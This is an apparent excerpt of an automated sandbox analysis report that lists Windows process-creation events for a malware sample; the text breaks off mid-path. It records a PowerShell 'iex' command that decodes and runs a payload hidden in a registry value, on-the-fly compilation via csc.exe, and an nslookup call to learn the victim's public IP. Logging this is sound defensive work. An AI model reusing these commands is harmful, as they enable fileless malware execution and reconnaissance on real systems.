            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framewor